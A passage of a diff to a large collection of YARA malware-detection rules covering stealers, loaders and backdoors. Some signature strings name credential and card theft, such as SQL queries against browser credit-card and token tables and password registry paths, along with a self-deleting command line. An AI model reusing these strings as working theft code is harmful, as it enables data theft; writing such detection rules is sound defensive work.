"https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/RustyDropper/win_mal_RustyDropper.yar#L1-L12" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/Pure Logs Stealer/purelogs_stealer_core.yar#L3-L18" license_url = "N/A" - hash = "a3a5e7011335a2284e2d4f73fd464ff129f0c9276878a054c1932bc50608584b" - logic_hash = "d0c76bcd1af63cc1b1fbabc3fa33e6caafd7d9c7c3780a94a1ed37eadef655d7" + logic_hash = "7388299ebcc70aeb86c46c29a787f790993a67148d9f3968def1109e45f69452" score = 75 - quality = 81 + quality = 83 tags = "FILE" strings: - $s1 = {47 3a 5c 52 55 53 54 5f 44 52 4f 50 50 45 52 5f 45 58 45 5f 50 41 59 4c 4f 41 44 5c 44 52 4f 50 50 45 52 5f 4d 41 49 4e 5c} - $s2 = {46 45 41 54 55 52 45 5f 42 52 4f 57 53 45 52 5f 45 4d 55 4c 41 54 49 4f 4e} + $s1 = {7E 58 00 00 0A [15] 28 20 00 00 0A 18 6F 0A 02 00 0A 0B} + $s2 = {50 6C 67 43 6F 72 65} + $s3 = {7E 64 01 00 0A 28 65 01 00 0A} condition: - uint16(0)==0x5A4D and all of them + all of ($s*) and filesize <5MB and pe.imports("mscoree.dll") } -rule RUSSIANPANDA_Garystealer : FILE +rule RUSSIANPANDA_Purelogs_Stealer_Initial_Dropper : FILE { meta: - description = "Detects GaryStealer 1-3-2024" + description = "Detects PureLogs Stealer Initial Payload" author = "RussianPanda" - id = "4b0af30e-2cf1-539d-89fa-7e4e32cd6eab" - date = "2024-01-03" - modified = "2024-01-03" - reference = "https://cybersecurity.att.com/blogs/labs-research/behind-the-scenes-jaskagos-coordinated-strike-on-macos-and-windows" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/GaryStealer/garystealer-1-3-2024.yar#L1-L20" + id = "c1e6a0a0-f8ed-5b78-bcae-55c1c1dfc9e4" + date = "2024-01-10" + modified = "2024-01-10" + reference = "https://russianpanda.com/2023/12/26/Pure-Logs-Stealer-Malware-Analysis/" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/Pure Logs Stealer/purelogs_stealer_initial_payload.yar#L1-L19" license_url = "N/A" - hash = "6efa29a0f9d112cfbb982f7d9c0ddfe395b0b0edb885c2d5409b33ad60ce1435" - logic_hash = "f71655d0cb237c08af9c298ec9eec1ae9bd1efd50e26d61afddf9056b6883a15" + logic_hash = "0fe94c705b94f82163f952d0a29aac4689947a1d439bdc1847ee510c25cf2e40" score = 75 - quality = 79 + quality = 85 tags = "FILE" strings: - $s1 = {72 75 6e 74 69 6d 65 2e 67 6f 70 61 6e 69 63} - $s2 = {4c 6f 63 61 6c 20 49 50 20 41 64 64 72 65 73 73 65 73 3a 5b 70 69 63 6b 2d 66 69 72 73 74 2d 6c 62 20 25 70 5d} - $s3 = {70 65 72 73 69 73 74 61 6E 63 65 20 63 72 65 61 74 65 64} - $s4 = {C7 40 28 ?? 00 00 00} + $s1 = {73 ?? 00 00 06 28 ?? 00 00 ?? 2A} + $s2 = {28 ?? 00 00 06 74 ?? 00 00 1B 28 ?? 00 00 0A 2A} + $s3 = {28 ?? 00 00 ?? 75 ?? 00 00 01 72 ?? 00 00 70 6F ?? 00 00 0A 2A} + $s4 = {28 ?? 00 00 ?? 75 ?? 00 00 01 72 ?? 00 00 ?? 20 00 01 00 00 14 14 14 6F ?? 00 00 ?? 26} + $s5 = {28 ?? 00 00 ?? 73 ?? 00 00 [29] 73 15 00 00 0A [22] 28 01 00 00 2B 28 02 00 00 2B} condition: - uint16(0)==0x5A4D and 3 of ($s*) and filesize <20MB and #s4>2 + all of ($s*) and uint16(0)==0x5A4D and filesize <1MB } -rule RUSSIANPANDA_PSWSTEALER : FILE +rule RUSSIANPANDA_Truecrypt_Crypter : FILE { meta: - description = "PSWSTEALER" + description = "Detects TrueCrypt crypter" author = "RussianPanda" - id = "8a596074-ffe3-5979-b384-487ebe8b953c" - date = "2023-04-02" - modified = "2023-05-05" + id = "3ecf9c2f-6205-5e55-83a5-2b4e3ba89f07" + date = "2024-01-06" + modified = "2024-01-06" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/PSWSTEALER/pswstealer.yar#L1-L14" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/TrueCrypt/truecrypt_crypter.yar#L1-L27" license_url = "N/A" - logic_hash = "7d85b0ccaa07419f22b9f38a4bc66435cd689b21fa7e4584ef8bea485b6bd2c1" + hash = "167637397fb45ea19bafcf208d8f27dceec82caa7ab19d40ecdb08eb1b7d4f60" + logic_hash = "68612c68053e9fb81d9616c04b04ac2e2cb685f3b7ed71f8b31e8f22e3a539e7" score = 75 - quality = 85 + quality = 81 tags = "FILE" strings: - $obf = {09 20 FF [3] 5F 06 25 17 58 0A 61 1E 62 09 1E 63 06 25 17 58 0A 61 D2 60 D1 9D} - $obf1 = {09 06 08 59 61 D2 13 04 09 1E 63 08 61 D2 13 05 07 08 11 05 1E 62 11 04 60 D1 9D 08 17 58 0C} - $enc = {73 ?? 00 00 0A 73 ?? 00 00 0A} - $s = {73 ?? 00 00 0A 0C 08 6F ?? 00 00 0A} + $s1_crpt1 = {77 69 6E 65 5F 67 65 74} + $s2_crpt1 = {49 3B 66 10 76} + $s2_crpt2 = {3B 55 48 89 E5 48 83 EC 10 90 8B 0D [22] E8 [3] FF} + $s3_crpt1 = {49 3B 66 10 76 43} + $s3_crpt2 = {55 48 89 E5 48 83 EC 10 [5] E8 [4] 48 85 FF 75 18} + $s4_crpt1 = {40 C0 EE 04 [16] 48 83} + $s4_crpt2 = {FA 20 [0-22] 48 83 FE 20} + $a_crpt = {61 2E 6F 75 74 2E 65 78 65 00 5F 63 67} + $s_crpt = {6F 5F 64 75 6D 6D 79 5F 65 78 70 6F 72 74} condition: - all of them and filesize <200KB + uint16(0)==0x5A4D and $s1_crpt1 and $s2_crpt1 and $s2_crpt2 and $s3_crpt1 and $s3_crpt2 and $s4_crpt1 and $s4_crpt2 and $a_crpt and $s_crpt and filesize <7MB } -rule RUSSIANPANDA_Prysmax_Stealer : FILE +rule RUSSIANPANDA_Mal_Xred_Backdoor : FILE { meta: - description = "Detects Prysmax Stealer" + description = "Detects XRed backdoor" author = "RussianPanda" - id = "97ab92b8-1771-5881-9cd1-d8ff76b8f380" - date = "2024-01-09" - modified = "2024-01-10" - reference = "https://www.cyfirma.com/outofband/new-maas-prysmax-launches-fully-undetectable-infostealer/" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/Prysmax Stealer/prysmax_stealer.yar#L1-L21" + id = "61f5fcb8-9351-5db0-8bce-123c96d2a443" + date = "2024-02-09" + modified = "2024-02-09" + reference = "https://github.com/RussianPanda95/Yara-Rules" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/XRed_Backdoor/mal_xred_backdoor.yar#L1-L18" license_url = "N/A" - logic_hash = "869eee7dd5209bdea98c248791b9ac911e3daabe6d440aa62aecefa43539a41c" + hash = "9e1fbae3a659899dde8db18a32daa46a" + logic_hash = "36d138a0efade1d5c075662dc528235fe66b49879730db78c4c7290fec7420b5" score = 75 quality = 73 tags = "FILE" strings: - $a1 = {23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23} - $s2 = {73 70 72 79 73 6D 61 78} - $s3 = {56 43 52 55 4E 54 49 4D 45 31 34 30 2E 64 6C 6C} - $s4 = {56 43 52 55 4E 54 49 4D 45 31 34 30 5F 31 2E 64 6C 6C} - $s5 = {4D 53 56 43 50 31 34 30 2E 64 6C 6C} - $s6 = {50 79 49 6E 73 74 61 6C 6C 65 72} + $s1 = {4B 65 79 62 6F 61 72 64 20 48 6F 6F 6B 20 2D 3E 20 41 63 74 69 76 65} + $s2 = {54 43 50 20 43 6C 69 65 6E 74 20 2D 3E 20 41 6B 74 69 66} + $s3 = {55 53 42 20 48 6F 6F 6B 73 20 2D 3E 20 41 63 74 69 76 65} + $s4 = {45 58 45 55 52 4C 31} + $s5 = {49 4E 49 55 52 4C 33} + $s6 = {58 52 65 64 35 37} condition: - all of ($s*) and uint16(0)==0x5A4D and $a1 in (9600000.. filesize ) and #a1>600 and filesize >60MB and filesize <200MB + uint16(0)==0x5A4D and 3 of them } -rule RUSSIANPANDA_Mal_Msedge_Dll_Virusloader : FILE +rule RUSSIANPANDA_Neptune_Loader : FILE { meta: - description = "Detects malicious msedge.dll file" + description = "Detects Neptune Loader" author = "RussianPanda" - id = "7139ee30-de9a-5ef0-a96f-2ab9c239c6ff" - date = "2024-01-19" - modified = "2024-01-19" - reference = "https://blog.phylum.io/npm-package-found-delivering-sophisticated-rat/" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/virusloader/mal_msedge_dll_virusloader.yar#L1-L16" + id = "d576bf47-10bd-55d0-99b0-69c02dc87f17" + date = "2024-01-17" + modified = "2024-01-21" + reference = "https://github.com/RussianPanda95/Yara-Rules" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/NeptuneLoader/neptune_loader.yar#L1-L18" license_url = "N/A" - hash = "ab2e3b07170ef1516af3af0d03388868" - logic_hash = "659fd5fa3121fec5bf4cceb6f3dea95bf4cbcde7441d6f11c35288d8ad75a803" + logic_hash = "ca54b8a624d48aa28bc727420f25e6f0fd67b193ac79443a357d88a9fe7cbdbb" score = 75 - quality = 85 + quality = 81 tags = "FILE" strings: - $s1 = {C6 85 ?? FE FF FF ?? C6} - $s2 = {C7 85 ?? FD FF FF} - $s3 = {BF 60 01 00 00 [18] 30 04 39 41} + $s1 = {8B C6 E8 F4 FB FF FF} + $s2 = {66 33 D1 66 89 54 58 FE} + $s3 = {7C 53 74 61 72 74 75 70 46 6F 6C 64 65 72 7C} + $s4 = {44 65 6C 70 68 69} + $t1 = {C7 [3] 0B 40 40 00 [6] A1 ?? 61 40 00} + $t2 = {C7 ?? 24 00 40 40 00 A1 ?? 61 40 00} + $t3 = {8B ?? ?? FF D0 B8} condition: - uint16(0)==0x5A4D and all of ($s*) and #s1>30 and #s2>30 and filesize <300KB + uint16(0)==0x5A4D and 3 of ($s*) or 2 of ($t*) and filesize <6MB } -rule RUSSIANPANDA_Mal_Cleanuploader : FILE +rule RUSSIANPANDA_Aurorastealer_March_2023 { meta: - description = "Detects CleanUpLoader" + description = "Detects an unobfuscated AuroraStealer March update binary" author = "RussianPanda" - id = "fc75fed2-0f8c-55c9-bd10-efe95a678f31" - date = "2024-02-14" - modified = "2024-02-14" - reference = "https://x.com/AnFam17/status/1757871703282077857?s=20" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/CleanUpLoader/mal_cleanuploader.yar#L1-L14" + id = "a115de7a-bff7-5bb0-b83f-f66a29bbcf3f" + date = "2023-03-23" + modified = "2023-05-05" + reference = "https://github.com/RussianPanda95/Yara-Rules" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/AuroraStealer/Aurora_March_2023.yar#L1-L15" license_url = "N/A" - hash = "2b62dd154b431d8309002d5b4a35de07" - logic_hash = "a9267c568c11420e36f0781469aa7d932c87d52707981912558eb0f4f84f673a" + logic_hash = "d74d2843a03e826f334ce3c5eb10cc2b43cfd832174769e5d067fb877abe13a0" score = 75 - quality = 83 - tags = "FILE" + quality = 85 + tags = "" strings: - $s1 = {0F B6 80 30 82 42 00 88} - $s2 = {44 69 73 6B 43 6C 72} - $s3 = {49 00 6E 00 73 00 74 00 61 00 6C 00 6C 00 20 00 45 00 64 00 67 00 65} + $b1 = { 48 8D 0D ?? ?? 05 00 E8 ?? ?? EF FF } + $ftp = "FOUND FTP" condition: - uint16(0)==0x5A4D and all of them and #s1>15 + all of them } -rule RUSSIANPANDA_Raccoonstealer : FILE +rule RUSSIANPANDA_Aurorastealer_1 { meta: - description = "Detects Raccoon Stealer v2.3.1.1" + description = "Detects the Build/Group IDs if present / detects an unobfuscated AuroraStealer binary; tested on version 22.12.2022" author = "RussianPanda" - id = "29f28cd5-370b-5831-8b71-a253f468f7e4" - date = "2024-01-08" - modified = "2024-01-08" - reference = "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-raccoon-stealer-v2-0" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/RaccoonStealer_v2/raccoonstealer_v2.3.1.1.yar#L1-L20" + id = "1a94096f-c838-5272-856e-42efbd123a31" + date = "2023-02-07" + modified = "2023-05-05" + reference = "https://github.com/RussianPanda95/Yara-Rules" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/AuroraStealer/AuroraStealer.yar#L1-L16" license_url = "N/A" - hash = "c6d0d98dd43822fe12a1d785df4e391db3c92846b0473b54762fbb929de6f5cb" - logic_hash = "ee2b39c1c2068b97e63a03330a2f9e2f12e53aaf9cfffb274acde2372a11fe45" - score = 75 + logic_hash = "7a9900266a0dfa7bf0ea91a0260a1d30bd7799a491fba87db083f4fea4115f2a" + score = 50 quality = 85 - tags = "FILE" + tags = "" strings: - $s1 = {8B 0D [2] 41 00 A3 [3] 00} - $s2 = "MachineGuid" - $s3 = "SELECT name_on_card, card_number_encrypted, expiration_month, expiration_year FROM credit_cards" - $s4 = "SELECT service, encrypted_token FROM token_service" - $s5 = "&configId=" - $s6 = "machineId=" + $b1 = { 48 8D 0D ?? ?? 04 00 E8 ?? ?? EF FF } + $go = "Go build ID" + $machineid = "MachineGuid" condition: - all of ($s*) and #s1>10 and uint16(0)==0x5A4D and filesize <5MB + all of them } -rule RUSSIANPANDA_Raccoonstealerv2 : FILE +rule RUSSIANPANDA_Sentinel_Stealer { meta: - description = "Detects the latest unpacked/unobfuscated build 2.1.0-4" + description = "Detects Sentinel Stealer" author = "RussianPanda" - id = "eda6216a-219b-5f60-8084-4c0c240a4cb4" - date = "2023-04-17" - modified = "2023-05-05" + id = "8a221d7b-8fa6-53cd-a3e8-63cc67285186" + date = "2024-01-19" + modified = "2024-01-19" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/RaccoonStealer_v2/raccoonstealerv2_2.1.0-4_build.yar#L1-L14" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/SentinelStealer/sentinel_stealer.yar#L1-L14" license_url = "N/A" - logic_hash = "e2226f08753a3571045953363c04ec52de3c79cd0cd29e7ecb6afaf2ad573e4e" - score = 50 + hash = "3a540a8a81c5a5b452f154d7875423a3" + logic_hash = "b9d72848842ea4d26544633bb83fccd17239b28493bde3f73341eb2004d8ee0c" + score = 75 quality = 85 - tags = "FILE" + tags = "" strings: - $pattern1 = {B9 ?? ?? ?? 00 E8 ?? ?? ?? 00 ?? ?? 89 45 E8} - $pattern2 = {68 ?? ?? ?? 00 ?? 68 01 00 1F 00} - $pattern3 = {68 ?? ?? ?? 00 ?? ?? 68 01 00 1F 00 FF 15 64 ?? ?? 00} - $m1 = {68 ?? ?? ?? 00 ?? 00 68 01 00 1f 00 ff 15 64 ?? ?? 00} - $m2 = {68 ?? ?? ?? 00 ?? 68 01 00 1f 00 ff 15 64 ?? ?? 00} + $s1 = "Sentinel.SmallerEncryptedIcon" wide + $s2 = "SentinelSteals" wide + $s4 = "_CorExeMain" condition: - 2 of ($pattern*) and uint16(0)==0x5A4D and 1 of ($m*) and uint32( uint32(0x3C))==0x00004550 and filesize <200KB + all of them } -rule RUSSIANPANDA_Ghostgambit : FILE +rule RUSSIANPANDA_Workersdevbackdoor_PS : FILE { meta: - description = "Detects GhostGambit dropper" + description = "Detects WorkersDevBackdoor PowerShell script" author = "RussianPanda" - id = "0348b9fa-59be-5f30-8ebc-f1e87cf98b07" - date = "2024-07-09" - modified = "2024-07-09" + id = "d2b526c1-a9f5-57de-818c-99b02e778a0d" + date = "2023-12-15" + modified = "2023-12-15" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/GhostGambit/GhostGambit.yar#L1-L14" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/WorkersDevBackdoor/WorkersDevBackdoor_PS.yar#L1-L18" license_url = "N/A" - hash = "2b16c68d9bafbd2ecf3634d991d7c794" - logic_hash = "419efbea3c347d0ec9365c0c21cccb6f229f8c42d22a2bcfdf14854e7f83aea1" + logic_hash = "c71eed8fd7a44f3018150cc6ef55d10779093ed8e4c77fd9babcf9b1b9fadfda" score = 75 quality = 85 tags = "FILE" strings: - $s1 = "/code32" ascii wide - $s2 = "/reg32" ascii wide - $s3 = "ZhuDongFangYu.exe" ascii wide - $s4 = "/c ping -n 4 127.0.0.1 > nul && del" ascii wide + $s1 = "sleep" wide + $s2 = "convertto-securestring" wide + $s3 = "System.Drawing.dll" wide + $s4 = "System.Web.Extensions.dll" wide + $s5 = "System.Windows.Forms.dll" wide + $s6 = "CSharp" wide condition: - uint16(0)==0x5A4D and all of them + all of ($s*) and filesize <200KB } import "pe" -rule RUSSIANPANDA_Metastealer_Core_Payload +rule RUSSIANPANDA_Workersdevbackdoor : FILE { meta: - description = "Detects MetaStealer Core Payload" + description = "Detects WorkersDevBackdoor" author = "RussianPanda" - id = "ff5854b5-4dac-59d7-8c5a-d5b808d63483" - date = "2023-12-29" - modified = "2023-12-29" + id = "725e0924-c108-5927-8d27-e4bc5b284883" + date = "2023-12-15" + modified = "2024-01-05" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/MetaStealer/metastealer_core_payload_12-2023.yar#L2-L19" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/WorkersDevBackdoor/WorkDevBackdoor.yar#L3-L20" license_url = "N/A" - logic_hash = "99a319023f2c1b714a70458bd33649d6cc343b500a409af12c2eb1ce38ba4241" + logic_hash = "f92ad9dc657d87a47e539ea2ee896f9b86bb95e51a890a838c6e6b0efa5deb7d" score = 75 quality = 85 - tags = "" + tags = "FILE" strings: - $s1 = "FileScannerRule" - $s2 = "TreeObject" - $s3 = "Schema" - $s4 = "StringDecrypt" - $s5 = "AccountDetails" + $s1 = {72 00 65 00 67 00 69 00 73 00 74 00 65 00 72 00 20 00 7B 00 30 00 7D 00 20 00 7B 00 31 00 7D} + $s2 = {72 FB 00 00 70 72 13 01 00 70 28 20 00 00 0A 72 2D 01 00 70} + $s3 = {55 00 53 00 45 00 52 00 44 00 4F 00 4D 00 41 00 49 00 4E} + $s4 = {43 00 4F 00 4D 00 50 00 55 00 54 00 45 00 52 00 4E 00 41 00 4D 00 45} condition: - 4 of ($s*) and pe.imports("mscoree.dll") + 3 of ($s*) and pe.imports("mscoree.dll") and filesize <2MB } import "pe" @@ -207542,7 +209500,7 @@ rule RUSSIANPANDA_Metastealer date = "2023-11-16" modified = "2023-12-30" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/MetaStealer/metastealer.yar#L2-L19" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/MetaStealer/metastealer.yar#L2-L19" license_url = "N/A" logic_hash = "f78b376713daf82aa2e0cbd6bf45f33d25530449fa05673c8a7c6b4c0dddca79" score = 75 @@ -207568,7 +209526,7 @@ rule RUSSIANPANDA_Metastealer_NET_Reactor_Packer : FILE date = "2023-12-29" modified = "2023-12-30" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/MetaStealer/metastealer_12-2023_packer.yar#L1-L16" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/MetaStealer/metastealer_12-2023_packer.yar#L1-L16" license_url = "N/A" logic_hash = "1951d8b05f11b8a77a5bf792ad2b0ad95b8dede936ab5cd0699383468c3c97a8" score = 75 @@ -207584,487 +209542,471 @@ rule RUSSIANPANDA_Metastealer_NET_Reactor_Packer : FILE condition: 3 of ($s*) and filesize <600KB } -import "dotnet" +import "pe" -rule RUSSIANPANDA_Purecrypter_Core : FILE +rule RUSSIANPANDA_Metastealer_Core_Payload { meta: - description = "Detects PureCrypter Core payload" + description = "Detects MetaStealer Core Payload" author = "RussianPanda" - id = "41aaa187-0fb5-53fe-a162-8d1a4974ccc1" - date = "2024-01-09" - modified = "2024-01-09" - reference = "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/PureCrypter/purecrypter_core.yar#L3-L28" + id = "ff5854b5-4dac-59d7-8c5a-d5b808d63483" + date = "2023-12-29" + modified = "2023-12-29" + reference = "https://github.com/RussianPanda95/Yara-Rules" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/MetaStealer/metastealer_core_payload_12-2023.yar#L2-L19" license_url = "N/A" - hash = "e4faa7d7a098414449abffb210fd874798207ee9d27643c8088676ff429b56b7" - logic_hash = "8c761a98369436ffbe1379152461753778985a42ae656567018b47c71af7d866" + logic_hash = "99a319023f2c1b714a70458bd33649d6cc343b500a409af12c2eb1ce38ba4241" score = 75 - quality = 81 - tags = "FILE" + quality = 85 + tags = "" strings: - $s1 = {47 5A 69 70 53 74 72 65 61 6D} - $s2 = {41 73 73 65 6D 62 6C 79 4C 6F 61 64 65 72 00 43 6F 73 74 75 72 61} - $s3 = {44 65 66 6C 61 74 65 53 74 72 65 61 6D} - $cnct = {72 ?? ?? 00 70 28 FB 00 00 0A 72 ?? ?? 00 70 28 ?? 00 00 0A} - $nr1 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 34 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 31 00 7D} - $nr2 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 34 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 32 00 7D} - $nr3 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 32 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 32 00 7D} - $nr4 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 32 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 31 00 7D} + $s1 = "FileScannerRule" + $s2 = "TreeObject" + $s3 = "Schema" + $s4 = "StringDecrypt" + $s5 = "AccountDetails" condition: - filesize <5MB and all of ($s*) and dotnet.number_of_resources>4 and dotnet.number_of_resources<6 and 2 of ($nr*) and dotnet.assembly_refs[1].name contains "protobuf-net" and #cnct>5 + 4 of ($s*) and pe.imports("mscoree.dll") } -import "dotnet" - -rule RUSSIANPANDA_Purecrypter : FILE +rule RUSSIANPANDA_Danabot { meta: - description = "Detects PureCrypter" + description = "Detects DanaBot" author = "RussianPanda" - id = "5670772c-ada1-55fa-b7fd-9dadd1756259" - date = "2024-01-09" - modified = "2024-01-09" - reference = "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/PureCrypter/purecrypter.yar#L3-L22" + id = "804604d9-db3b-5678-ae0d-67f0e876c93e" + date = "2023-12-01" + modified = "2023-12-01" + reference = "https://github.com/RussianPanda95/Yara-Rules" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/DanaBot/danabot_yara.yar#L1-L17" license_url = "N/A" - hash = "566d8749e166436792dfcbb5e5514f18c9afc0e1314833ac2e3d86f37ff2030f" - logic_hash = "dd8592fa0b7d240d23235008601500a20e068032f6dcd6e90a38b06ac747b8af" + logic_hash = "4968531f27fa1a8bc3fca536a04b75277adefc42addb9f1999c564510cbcb684" score = 75 quality = 83 - tags = "FILE" + tags = "" strings: - $s1 = {28 ?? 00 00 ?? 28 02 00 00 2B 28 ?? 00 00 (0A|06)} - $s2 = {73 ?? 00 00 0A} - $s3 = {73 ?? 00 00 06 6F ?? 00 00 06} - $s4 = {52 65 73 6F 75 72 63 65 4D 61 6E 61 67 65 72} - $s5 = {28 ?? 00 00 ?? 6F ?? 00 00 0A 28 03 00 00 2B ?? 6F ?? 00 00 0A 28 ?? 00 00 2B} + $s1 = {55 8b ec 8a 45 08 34 4a 5d c2 04 00} + $s2 = {4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 5C 00 53 00 65 00 61 00 4D 00 6F 00 6E 00 6B 00 65 00 79} + $s3 = {4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 20 00 54 00 68 00 75 00 6E 00 64 00 65 00 72 00 62 00 69 00 72 00 64 00} + $s4 = {53 00 6F 00 66 00 74 00 77 00 61 00 72 00 65 00 5C 00 4F 00 52 00 4C 00 5C 00 57 00 69 00 6E 00 56 00 4E 00 43 00 33 00 5C 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64} + $s5 = {53 00 6F 00 66 00 74 00 77 00 61 00 72 00 65 00 5C 00 45 00 78 00 63 00 69 00 74 00 65 00 5C 00 50 00 72 00 69 00 76 00 61 00 74 00 65 00 4D 00 65 00 73 00 73 00 65 00 6E 00 67 00 65 00 72 00 5C 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64} + $a = {44 45 4C 50 48 49 43 4C 41 53 53} condition: - filesize <6MB and 4 of ($s*) and dotnet.number_of_resources>0 and dotnet.number_of_resources<2 and dotnet.resources[0].length>300KB + 3 of ($s*) and $a } -rule RUSSIANPANDA_Pikabot_1 : FILE +rule RUSSIANPANDA_Win_Mal_Koi_Loader : FILE { meta: - description = "Detects PikaBot" + description = "Detects Koi Loader" author = "RussianPanda" - id = "e740b821-69cc-5053-9f90-439b4364656f" - date = "2024-01-02" - modified = "2024-01-02" - reference = "https://research.openanalysis.net/pikabot/debugging/string%20decryption/2023/11/12/new-pikabot.html" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/PikaBot/Pikabot_1-2-2024.yar#L1-L16" + id = "a608558d-97c8-5161-a6eb-29fd420458a8" + date = "2024-04-04" + modified = "2024-04-04" + reference = "https://github.com/RussianPanda95/Yara-Rules" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/Koi/win_mal_Koi_loader.yar#L1-L14" license_url = "N/A" - logic_hash = "f2dd26c23aba72c2b6b959fb411381b7d3a7466f94bf5259f57e96e44d3ee153" + hash = "47e208687c2fb40bdbaa17e368aaa1bd" + logic_hash = "4f909865c6d274804c3fa7f66822d7bea71bb93e7c6a422ebaf220df056ac095" score = 75 quality = 85 tags = "FILE" strings: - $s1 = {8A 04 11 30 02 42 83 EE 01 75 F5 5E C3} - $s2 = {C0 E9 02 C0 E0 04 [13] C0 E2 06 02 D0} - $s3 = {8D 53 BF 80 FA 19 0F B6 C3} + $s1 = {27 11 68 05} + $s2 = {15 B1 B3 09} + $s3 = {B5 96 AA 0D} + $s4 = {74 [0-10] C1 E9 18} condition: - uint16(0)==0x5A4D and 2 of ($s*) and filesize <500KB + uint16(0)==0x5A4D and all of ($s*) } -rule RUSSIANPANDA_Neptune_Loader : FILE +rule RUSSIANPANDA_Win_Mal_Koistealer_PS { meta: - description = "Detects Neptune Loader" + description = "Detects KoiStealer PowerShell script" author = "RussianPanda" - id = "d576bf47-10bd-55d0-99b0-69c02dc87f17" - date = "2024-01-17" - modified = "2024-01-21" + id = "6dfdb39c-1b6a-5969-9c2d-e09869af6e0f" + date = "2024-04-04" + modified = "2024-04-04" reference = "https://github.com/RussianPanda95/Yara-Rules" - source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/7a3ae6d427ff9887a7cdf47ce6b948f56cc74cbd/NeptuneLoader/neptune_loader.yar#L1-L18" + source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/79732e6e8f5973cbed6c6c032c2e6a9c08596874/Koi/win_mal_KoiStealer_PS.yar#L1-L12" license_url = "N/A" - logic_hash = "ca54b8a624d48aa28bc727420f25e6f0fd67b193ac79443a357d88a9fe7cbdbb" + hash = "4f55be0b55ec67dfda42b88e9c743a2a" + logic_hash = 